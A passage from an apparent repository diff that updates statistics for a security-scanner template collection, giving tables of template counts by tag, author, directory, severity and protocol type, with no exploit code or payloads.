:"scimono","count":1},{"name":"faraday","count":1},{"name":"nsasg","count":1},{"name":"owa","count":1},{"name":"b2evolution","count":1},{"name":"phpunit","count":1},{"name":"openstack","count":1},{"name":"anchorcms","count":1},{"name":"calendarix","count":1},{"name":"woocomernce","count":1},{"name":"plugin","count":1},{"name":"tongda","count":1},{"name":"metinfo","count":1},{"name":"opentsdb","count":1},{"name":"fortigate","count":1},{"name":"arl","count":1},{"name":"powercreator","count":1},{"name":"phpinfo","count":1},{"name":"azkaban","count":1},{"name":"alerta","count":1},{"name":"plone","count":1},{"name":"seacms","count":1},{"name":"cgi","count":1},{"name":"api-manager","count":1},{"name":"pagespeed","count":1},{"name":"sitecore","count":1},{"name":"fortilogger","count":1},{"name":"xml","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"asus","count":1},{"name":"sureline","count":1},{"name":"yealink","count":1},{"name":"achecker","count":1},{"name":"wondercms","count":1},{"name":"zcms","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"ilo4","count":1},{"name":"spidercontrol","count":1},{"name":"panos","count":1},{"name":"cacti","count":1},{"name":"linkedin","count":1},{"name":"tensorflow","count":1},{"name":"glances","count":1},{"name":"yachtcontrol","count":1},{"name":"mirai","count":1},{"name":"lutron","count":1},{"name":"servicedesk","count":1},{"name":"jsp","count":1},{"name":"alibaba","count":1},{"name":"flash","count":1},{"name":"haproxy","count":1},{"name":"druid","count":1},{"name":"comodo","count":1},{"name":"bitly","count":1},{"name":"dvr","count":1},{"name":"sentry","count":1},{"name":"webadmin","count":1},{"name":"phpfusion","count":1},{"name":"concrete","count":1},{"name":"nexusdb","count":1},{"name":"gateone","count":1},{"name":"acexy","count":1},{"name":"scs","count":1},{"name":"tamronos","count":1},{"name":"beanshell","count":1},{"name":"xmlchart","count":1},{"name":"starttls","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"aspnuke","count":1},{"name":"interlib","count":1},{"name":"alertmanager","count":1},{"name":"payara","count":1},{"name":"iceflow","count":1},{"name":"emby","count":1},{"name":"gotmls","count":1},{"name":"default","count":1},{"name":"myucms","count":1},{"name":"robomongo","count":1},{"name":"openemr","count":1},{"name":"phalcon","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"zeroshell","count":1},{"name":"adminer","count":1},{"name":"jenzabar","count":1},{"name":"fastcgi","count":1},{"name":"heroku","count":1},{"name":"selea","count":1},{"name":"triconsole","count":1},{"name":"db","count":1},{"name":"octobercms","count":1},{"name":"maccmsv10","count":1},{"name":"jmx","count":1},{"name":"netdata","count":1},{"name":"spring","count":1},{"name":"rujjie","count":1},{"name":"74cms","count":1},{"name":"enumeration","count":1},{"name":"tileserver","count":1},{"name":"fortinet","count":1},{"name":"fortiweb","count":1},{"name":"gitlist","count":1},{"name":"cors","count":1},{"name":"ec2","count":1},{"name":"darkstat","count":1},{"name":"servicenow","count":1},{"name":"tieline","count":1},{"name":"csod","count":1},{"name":"mautic","count":1},{"name":"mongo","count":1},{"name":"plc","count":1},{"name":"sourcebans","count":1},{"name":"huijietong","count":1},{"name":"h3c-imc","count":1},{"name":"owasp","count":1},{"name":"lighttpd","count":1},{"name":"expressjs","count":1},{"name":"qsan","count":1},{"name":"oscommerce","count":1},{"name":"sar2html","count":1},{"name":"lansweeper","count":1},{"name":"kubeflow","count":1},{"name":"salesforce","count":1},{"name":"discord","count":1},{"name":"mongoshake","count":1},{"name":"oneblog","count":1},{"name":"rabbitmq","count":1},{"name":"websvn","count":1},{"name":"proftpd","count":1},{"name":"webui","count":1},{"name":"viewpoint","count":1},{"name":"upnp","count":1},{"name":"zte","count":1},{"name":"argussurveillance","count":1},{"name":"nweb2fax","count":1},{"name":"adb","count":1},{"name":"weiphp","count":1},{"name":"eyelock","count":1},{"name":"episerver","count":1},{"name":"webmodule-ee","count":1},{"name":"lg-nas","count":1},{"name":"codemeter","count":1},{"name":"prestashop","count":1},{"name":"feifeicms","count":1},{"name":"jfrog","count":1},{"name":"openrestry","count":1},{"name":"enum","count":1},{"name":"xff","count":1},{"name":"avtech","count":1},{"name":"apiman","count":1},{"name":"ulterius","count":1},{"name":"circontrorl","count":1},{"name":"lancom","count":1},{"name":"idemia","count":1},{"name":"ruckus","count":1},{"name":"addpac","count":1},{"name":"solarlog","count":1},{"name":"qcubed","count":1},{"name":"smartsense","count":1},{"name":"wiki","count":1},{"name":"rsyncd","count":1},{"name":"expn","count":1},{"name":"tensorboard","count":1},{"name":"bazarr","count":1},{"name":"sceditor","count":1},{"name":"favicon","count":1},{"name":"trane","count":1},{"name":"kafdrop","count":1},{"name":"centreon","count":1},{"name":"landray","count":1},{"name":"tika","count":1},{"name":"rmc","count":1},{"name":"netgenie","count":1},{"name":"domxss","count":1},{"name":"mpsec","count":1},{"name":"dom","count":1},{"name":"acontent","count":1},{"name":"wifisky","count":1},{"name":"wildfly","count":1},{"name":"k8s","count":1},{"name":"wamp","count":1},{"name":"drone","count":1},{"name":"bedita","count":1},{"name":"upload","count":1},{"name":"redwood","count":1},{"name":"rmi","count":1},{"name":"froxlor","count":1},{"name":"zend","count":1},{"name":"nc2","count":1},{"name":"socomec","count":1},{"name":"opensns","count":1},{"name":"rhymix","count":1},{"name":"wavlink","count":1},{"name":"zm","count":1},{"name":"zookeeper","count":1},{"name":"cyberoam","count":1},{"name":"htmli","count":1},{"name":"empirecms","count":1},{"name":"mdb","count":1},{"name":"octoprint","count":1},{"name":"stem","count":1},{"name":"tpshop","count":1},{"name":"javamelody","count":1},{"name":"etouch","count":1},{"name":"swagger","count":1},{"name":"dompdf","count":1},{"name":"centos","count":1},{"name":"fortigates","count":1},{"name":"commscope","count":1},{"name":"simplecrm","count":1},{"name":"solman","count":1},{"name":"circontrol","count":1},{"name":"postgres","count":1},{"name":"ioncube","count":1},{"name":"javascript","count":1},{"name":"chinaunicom","count":1},{"name":"gridx","count":1},{"name":"qvisdvr","count":1},{"name":"ueditor","count":1},{"name":"discourse","count":1},{"name":"accela","count":1},{"name":"couchbase","count":1},{"name":"blue-ocean","count":1},{"name":"dbeaver","count":1},{"name":"resourcespace","count":1},{"name":"javafaces","count":1},{"name":"ganglia","count":1}],"authors":[{"name":"pikpikcu","count":243},{"name":"dhiyaneshdk","count":240},{"name":"pdteam","count":196},{"name":"daffainfo","count":160},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":131},{"name":"gy741","count":71},{"name":"madrobot","count":62},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"meme-lord","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"vsh00t","count":3},{"name":"incogbyte","count":3},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"0w4ys","count":3},{"name":"shine","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"jarijaas","count":3},{"name":"koti2","count":2},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"lu4nx","count":2},{"name":"arcc","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"0xprial","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"w4cky_","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"mohammedsaneem","count":2},{"name":"swissky","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"sushantkamble","count":2},{"name":"ree4pwn","count":2},{"name":"gal nagli","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"fabaff","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"0xcrypto","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amsda","count":2},{"name":"0xrudra","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"udit_thakkur","count":2},{"name":"parth","count":2},{"name":"0xsapra","count":2},{"name":"hahwul","count":2},{"name":"geraldino2","count":1},{"name":"flag007","count":1},{"name":"intx0x80","count":1},{"name":"qlkwej","count":1},{"name":"_c0wb0y_","count":1},{"name":"cookiehanhoan","count":1},{"name":"idealphase","count":1},{"name":"elmahdi","count":1},{"name":"patralos","count":1},{"name":"micha3lb3n","count":1},{"name":"hakluke","count":1},{"name":"whynotke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"rtcms","count":1},{"name":"furkansenan","count":1},{"name":"th3.d1p4k","count":1},{"name":"rojanrijal","count":1},{"name":"juicypotato1","count":1},{"name":"nytr0gen","count":1},{"name":"iampritam","count":1},{"name":"_harleo","count":1},{"name":"exploitation","count":1},{"name":"0ut0fb4nd","count":1},{"name":"dogasantos","count":1},{"name":"bjhulst","count":1},{"name":"raesene","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"aresx","count":1},{"name":"kurohost","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"remonsec","count":1},{"name":"daviey","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"alex","count":1},{"name":"mass0ma","count":1},{"name":"tirtha_mandal","count":1},{"name":"adrianmf","count":1},{"name":"abison_binoy","count":1},{"name":"yashanand155","count":1},{"name":"notsoevilweasel","count":1},{"name":"pratik khalane","count":1},{"name":"ooooooo_q","count":1},{"name":"affix","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"retr0","count":1},{"name":"52971","count":1},{"name":"soyelmago","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"its0x08","count":1},{"name":"toufik airane","count":1},{"name":"un-fmunozs","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"makyotox","count":1},{"name":"@dwisiswant0","count":1},{"name":"alph4byt3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"ldionmarcil","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"absshax","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"sickwell","count":1},{"name":"huowuzhao","count":1},{"name":"shelld3v","count":1},{"name":"infosecsanyam","count":1},{"name":"zandros0","count":1},{"name":"evolutionsec","count":1},{"name":"kareemse1im","count":1},{"name":"johnjhacking","count":1},{"name":"rodnt","count":1},{"name":"fmunozs","count":1},{"name":"schniggie","count":1},{"name":"ajaysenr","count":1},{"name":"sullo","count":1},{"name":"willd96","count":1},{"name":"bolli95","count":1},{"name":"luci","count":1},{"name":"deena","count":1},{"name":"blckraven","count":1},{"name":"shifacyclewla","count":1},{"name":"c3l3si4n","count":1},{"name":"revblock","count":1},{"name":"ringo","count":1},{"name":"shreyapohekar","count":1},{"name":"sy3omda","count":1},{"name":"udyz","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ohlinge","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"streetofhackerr007","count":1},{"name":"ilovebinbash","count":1},{"name":"_darrenmartyn","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"naglinagli","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"luskabol","count":1},{"name":"apt-mirror","count":1},{"name":"b0yd","count":1},{"name":"r3naissance","count":1},{"name":"sshell","count":1},{"name":"me9187","count":1},{"name":"co0nan","count":1},{"name":"philippdelteil","count":1},{"name":"berkdusunur","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"0h1in9e","count":1},{"name":"knassar702","count":1},{"name":"jeya seelan","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"s1r1u5_","count":1},{"name":"sicksec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"0xteles","count":1},{"name":"undefl0w","count":1},{"name":"andirrahmani1","count":1},{"name":"andysvints","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"taielab","count":1},{"name":"vzamanillo","count":1},{"name":"mesaglio","count":1},{"name":"johnk3r","count":1},{"name":"mhdsamx","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"b4uh0lz","count":1},{"name":"smaranchand","count":1},{"name":"pudsec","count":1},{"name":"whoever","count":1},{"name":"bernardofsr","count":1},{"name":"mubassirpatel","count":1},{"name":"bad5ect0r","count":1},{"name":"dawid czarnecki","count":1},{"name":"divya_mudgal","count":1},{"name":"becivells","count":1},{"name":"0xtavian","count":1},{"name":"thezakman","count":1},{"name":"zhenwarx","count":1},{"name":"elder tao","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"hanlaomo","count":1},{"name":"chron0x","count":1},{"name":"pdp","count":1},{"name":"yavolo","count":1},{"name":"noamrathaus","count":1},{"name":"sec_hawk","count":1}],"directory":[{"name":"cves","count":631},{"name":"vulnerabilities","count":281},{"name":"exposed-panels","count":225},{"name":"exposures","count":182},{"name":"technologies","count":160},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":29},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":592},{"name":"high","count":504},{"name":"medium","count":398},{"name":"critical","count":230},{"name":"low","count":161}],"types":[{"name":"http","count":1785},{"name":"file","count":46},{"name":"network","count":38},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 685258af51..ca0925968b 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,706 +1,732 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 | -| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 | -| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 | -| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 | -| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | | -| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | | -| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | | -| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | | +| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | +| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | +| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | +| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | +| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | +| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| tech | 101 | gaurang | 42 | workflows | 35 | | | | | -| cve2021 | 96 | pussycat0x | 41 | miscellaneous | 27 | | | | | -| config | 91 | ice3man | 26 | network | 27 | | | | | -| cve2019 | 87 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 76 | 0x_akoko | 23 | dns | 11 | | | | | -| takeover | 73 | philippedelteil | 17 | cnvd | 9 | | | | | -| | 65 | sheikhrishad | 15 | fuzzing | 8 | | | | | +| tech | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| cve2021 | 103 | gaurang | 42 | network | 29 | | | | | +| config | 93 | ice3man | 26 | miscellaneous | 27 | | | | | +| cve2019 | 88 | organiccrap | 24 | iot | 23 | | | | | +| cve2018 | 78 | 0x_akoko | 23 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | +| | 65 | sheikhrishad | 15 | cnvd | 9 | | | | | | token | 64 | milo2012 | 14 | headless | 5 | | | | | -| apache | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 55 | techbrunchfr | 13 | | | | | | | -| iot | 48 | suman_kar | 12 | | | | | | | -| cve2017 | 47 | cyllective | 11 | | | | | | | -| file | 46 | random_robbie | 10 | | | | | | | -| oob | 44 | r3dg33k | 10 | | | | | | | -| unauth | 42 | righettod | 10 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 35 | hackergautam | 9 | | | | | | | -| cve2016 | 32 | nadino | 8 | | | | | | | -| ssrf | 31 | aashiq | 8 | | | | | | | -| workflow | 30 | iamthefrogy | 8 | | | | | | | -| logs | 29 | that_juan_ | 8 | | | | | | | -| oracle | 29 | melbadry9 | 8 | | | | | | | -| misc | 27 | emadshanab | 7 | | | | | | | -| atlassian | 26 | techryptic (@tech) | 7 | | | | | | | -| jira | 26 | dr_set | 7 | | | | | | | -| redirect | 25 | harshbothra_ | 7 | | | | | | | -| listing | 24 | 0x240x23elu | 7 | | | | | | | -| aem | 19 | randomstr1ng | 7 | | | | | | | -| generic | 19 | kophjager007 | 7 | | | | | | | -| sap | 18 | oppsec | 7 | | | | | | | -| cve2015 | 18 | puzzlepeaches | 6 | | | | | | | -| cisco | 18 | caspergn | 6 | | | | | | | -| disclosure | 17 | __fazal | 6 | | | | | | | -| springboot | 15 | yanyun | 5 | | | | | | | +| apache | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 57 | pr3r00t | 13 | | | | | | | +| iot | 54 | suman_kar | 12 | | | | | | | +| cve2017 | 48 | r3dg33k | 11 | | | | | | | +| file | 46 | cyllective | 11 | | | | | | | +| oob | 45 | righettod | 10 | | | | | | | +| unauth | 42 | random_robbie | 10 | | | | | | | +| network | 38 | hackergautam | 9 | | | | | | | +| joomla | 36 | nadino | 9 | | | | | | | +| sqli | 36 | wdahlenb | 9 | | | | | | | +| ssrf | 32 | melbadry9 | 9 | | | | | | | +| cve2016 | 32 | aashiq | 8 | | | | | | | +| oracle | 30 | that_juan_ | 8 | | | | | | | +| logs | 30 | iamthefrogy | 8 | | | | | | | +| workflow | 30 | harshbothra_ | 7 | | | | | | | +| cve2010 | 28 | 0x240x23elu | 7 | | | | | | | +| misc | 27 | dr_set | 7 | | | | | | | +| atlassian | 27 | oppsec | 7 | | | | | | | +| jira | 27 | techryptic (@tech) | 7 | | | | | | | +| redirect | 25 | kophjager007 | 7 | | | | | | | +| listing | 25 | randomstr1ng | 7 | | | | | | | +| generic | 22 | emadshanab | 7 | | | | | | | +| cisco | 19 | puzzlepeaches | 6 | | | | | | | +| aem | 19 | __fazal | 6 | | | | | | | +| disclosure | 18 | caspergn | 6 | | | | | | | +| sap | 18 | panch0r3d | 5 | | | | | | | +| cve2015 | 18 | yanyun | 5 | | | | | | | +| router | 17 | pentest_swissky | 5 | | | | | | | +| auth-bypass | 16 | rootxharsh | 5 | | | | | | | +| springboot | 16 | meme-lord | 5 | | | | | | | | cve2014 | 15 | ganofins | 5 | | | | | | | -| joomla | 15 | panch0r3d | 5 | | | | | | | +| debug | 14 | joanbono | 5 | | | | | | | | cve2012 | 14 | iamnoooob | 5 | | | | | | | -| debug | 14 | pentest_swissky | 5 | | | | | | | -| auth-bypass | 13 | joanbono | 5 | | | | | | | -| cve2011 | 13 | meme-lord | 5 | | | | | | | -| android | 13 | rootxharsh | 5 | | | | | | | +| fuzz | 13 | elsfa7110 | 4 | | | | | | | | misconfig | 13 | e_schultze_ | 4 | | | | | | | +| android | 13 | nodauf | 4 | | | | | | | | struts | 13 | xelkomy | 4 | | | | | | | -| jenkins | 12 | elsfa7110 | 4 | | | | | | | -| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | -| adobe | 12 | nodauf | 4 | | | | | | | -| dlink | 12 | mavericknerd | 3 | | | | | | | -| dns | 12 | yash anand @yashanand155 | 3 | | | | | | | -| router | 11 | _generic_human_ | 3 | | | | | | | +| cve2011 | 13 | github.com/its0x08 | 4 | | | | | | | +| weblogic | 12 | yash anand @yashanand155 | 3 | | | | | | | +| dlink | 12 | binaryfigments | 3 | | | | | | | +| adobe | 12 | jarijaas | 3 | | | | | | | +| jenkins | 12 | emenalf | 3 | | | | | | | +| dns | 12 | z3bd | 3 | | | | | | | +| devops | 11 | dudez | 3 | | | | | | | +| cve2013 | 11 | incogbyte | 3 | | | | | | | | zoho | 11 | f1tz | 3 | | | | | | | -| php | 11 | vsh00t | 3 | | | | | | | -| devops | 11 | fyoorer | 3 | | | | | | | -| fuzz | 11 | dudez | 3 | | | | | | | -| cve2013 | 11 | binaryfigments | 3 | | | | | | | -| cve2010 | 9 | thomas_from_offensity | 3 | | | | | | | +| php | 11 | 0w4ys | 3 | | | | | | | +| xxe | 9 | fyoorer | 3 | | | | | | | | magento | 9 | impramodsargar | 3 | | | | | | | -| xxe | 8 | 0w4ys | 3 | | | | | | | -| airflow | 8 | shifacyclewala | 3 | | | | | | | -| rails | 8 | shine | 3 | | | | | | | -| ruijie | 8 | z3bd | 3 | | | | | | | -| gitlab | 8 | jarijaas | 3 | | | | | | | -| cnvd | 8 | emenalf | 3 | | | | | | | -| aws | 8 | tess | 3 | | | | | | | -| ftp | 8 | amsda | 2 | | | | | | | -| scada | 7 | manas_harsh | 2 | | | | | | | -| vmware | 7 | x1m_martijn | 2 | | | | | | | -| nginx | 7 | hahwul | 2 | | | | | | | -| cve2009 | 7 | zomsop82 | 2 | | | | | | | -| login | 7 | randomrobbie | 2 | | | | | | | -| citrix | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| solr | 6 | lu4nx | 2 | | | | | | | -| google | 6 | alifathi-h1 | 2 | | | | | | | -| jetty | 6 | incogbyte | 2 | | | | | | | -| coldfusion | 6 | moritz nentwig | 2 | | | | | | | -| laravel | 6 | arcc | 2 | | | | | | | -| dell | 6 | nkxxkn | 2 | | | | | | | -| cms | 6 | unstabl3 | 2 | | | | | | | -| api | 6 | random-robbie | 2 | | | | | | | -| rconfig | 6 | 0xcrypto | 2 | | | | | | | -| backup | 6 | koti2 | 2 | | | | | | | -| netgear | 5 | davidmckennirey | 2 | | | | | | | -| headless | 5 | swissky | 2 | | | | | | | -| files | 5 | ree4pwn | 2 | | | | | | | -| django | 5 | afaq | 2 | | | | | | | -| ssti | 5 | 0xprial | 2 | | | | | | | -| iis | 5 | hetroublemakr | 2 | | | | | | | -| confluence | 5 | kiblyn11 | 2 | | | | | | | -| java | 5 | fabaff | 2 | | | | | | | -| drupal | 5 | bp0lr | 2 | | | | | | | -| phpmyadmin | 5 | gevakun | 2 | | | | | | | -| circarlife | 5 | lotusdll | 2 | | | | | | | -| lucee | 5 | vavkamil | 2 | | | | | | | -| ibm | 5 | pxmme1337 | 2 | | | | | | | -| dedecms | 5 | parth | 2 | | | | | | | -| fileupload | 5 | w4cky_ | 2 | | | | | | | -| wp-theme | 5 | foulenzer | 2 | | | | | | | -| magmi | 4 | joeldeleep | 2 | | | | | | | -| deserialization | 4 | 0xrudra | 2 | | | | | | | -| vpn | 4 | 0xelkomy | 2 | | | | | | | -| crlf | 4 | udit_thakkur | 2 | | | | | | | -| samsung | 4 | dheerajmadhukar | 2 | | | | | | | -| artifactory | 4 | gal nagli | 2 | | | | | | | -| docker | 4 | bing0o | 2 | | | | | | | -| tomcat | 4 | bsysop | 2 | | | | | | | -| webserver | 4 | 0xsapra | 2 | | | | | | | -| moodle | 4 | sushantkamble | 2 | | | | | | | -| hongdian | 4 | ehsahil | 2 | | | | | | | -| zimbra | 4 | divya_mudgal | 1 | | | | | | | -| cve2008 | 4 | huowuzhao | 1 | | | | | | | -| jolokia | 4 | 52971 | 1 | | | | | | | -| firmware | 4 | kabirsuda | 1 | | | | | | | -| asp | 4 | sicksec | 1 | | | | | | | -| traversal | 4 | b0yd | 1 | | | | | | | -| nodejs | 4 | aresx | 1 | | | | | | | -| buffalo | 4 | d0rkerdevil | 1 | | | | | | | -| thinkcmf | 4 | makyotox | 1 | | | | | | | -| windows | 4 | geraldino2 | 1 | | | | | | | -| elastic | 4 | juicypotato1 | 1 | | | | | | | -| thinkphp | 4 | jeya seelan | 1 | | | | | | | -| solarwinds | 4 | rojanrijal | 1 | | | | | | | -| ebs | 3 | andysvints | 1 | | | | | | | -| backups | 3 | pudsec | 1 | | | | | | | -| vbulletin | 3 | @dwisiswant0 | 1 | | | | | | | -| symfony | 3 | 0ut0fb4nd | 1 | | | | | | | -| fpd | 3 | noamrathaus | 1 | | | | | | | -| wso2 | 3 | remonsec | 1 | | | | | | | -| nexus | 3 | zhenwarx | 1 | | | | | | | -| bypass | 3 | flag007 | 1 | | | | | | | -| amazon | 3 | philippdelteil | 1 | | | | | | | -| fanruan | 3 | mesaglio | 1 | | | | | | | -| log | 3 | elmahdi | 1 | | | | | | | -| printer | 3 | thezakman | 1 | | | | | | | -| tikiwiki | 3 | exploitation | 1 | | | | | | | -| openssh | 3 | c3l3si4n | 1 | | | | | | | -| resin | 3 | deena | 1 | | | | | | | -| nacos | 3 | rodnt | 1 | | | | | | | -| ssh | 3 | ringo | 1 | | | | | | | -| kafka | 3 | 0h1in9e | 1 | | | | | | | -| microsoft | 3 | ilovebinbash | 1 | | | | | | | -| hp | 3 | mhdsamx | 1 | | | | | | | -| httpd | 3 | manuelbua | 1 | | | | | | | -| ofbiz | 3 | sy3omda | 1 | | | | | | | -| caucho | 3 | revblock | 1 | | | | | | | -| nosqli | 3 | alex | 1 | | | | | | | -| springcloud | 3 | berkdusunur | 1 | | | | | | | -| microstrategy | 3 | mohammedsaneem | 1 | | | | | | | -| bitrix | 3 | becivells | 1 | | | | | | | -| lfr | 3 | ratnadip gajbhiye | 1 | | | | | | | -| mongodb | 3 | alph4byt3 | 1 | | | | | | | -| kubernetes | 3 | undefl0w | 1 | | | | | | | -| itop | 3 | rtcms | 1 | | | | | | | -| r-seenet | 3 | un-fmunozs | 1 | | | | | | | -| grafana | 3 | blckraven | 1 | | | | | | | -| opensis | 3 | alperenkesk | 1 | | | | | | | -| oa | 3 | naglinagli | 1 | | | | | | | -| git | 3 | me9187 | 1 | | | | | | | -| zhiyuan | 3 | jteles | 1 | | | | | | | -| zabbix | 3 | r3naissance | 1 | | | | | | | -| slack | 3 | shelld3v | 1 | | | | | | | -| targa | 3 | yashanand155 | 1 | | | | | | | -| terramaster | 3 | sickwell | 1 | | | | | | | -| kevinlab | 3 | shreyapohekar | 1 | | | | | | | -| smb | 2 | akash.c | 1 | | | | | | | -| telerik | 2 | fopina | 1 | | | | | | | -| hasura | 2 | 0xtavian | 1 | | | | | | | -| xxljob | 2 | ohlinge | 1 | | | | | | | -| seeyon | 2 | cookiehanhoan | 1 | | | | | | | -| couchdb | 2 | apt-mirror | 1 | | | | | | | -| jellyfin | 2 | absshax | 1 | | | | | | | -| natshell | 2 | akshansh | 1 | | | | | | | -| avantfax | 2 | yavolo | 1 | | | | | | | -| phpcollab | 2 | bolli95 | 1 | | | | | | | -| pega | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| akamai | 2 | regala_ | 1 | | | | | | | -| status | 2 | smaranchand | 1 | | | | | | | -| rockmongo | 2 | daviey | 1 | | | | | | | -| grav | 2 | pratik khalane | 1 | | | | | | | -| mida | 2 | qlkwej | 1 | | | | | | | -| waf | 2 | willd96 | 1 | | | | | | | -| smtp | 2 | j33n1k4 | 1 | | | | | | | -| frp | 2 | affix | 1 | | | | | | | -| vrealize | 2 | petruknisme | 1 | | | | | | | -| spark | 2 | dogasantos | 1 | | | | | | 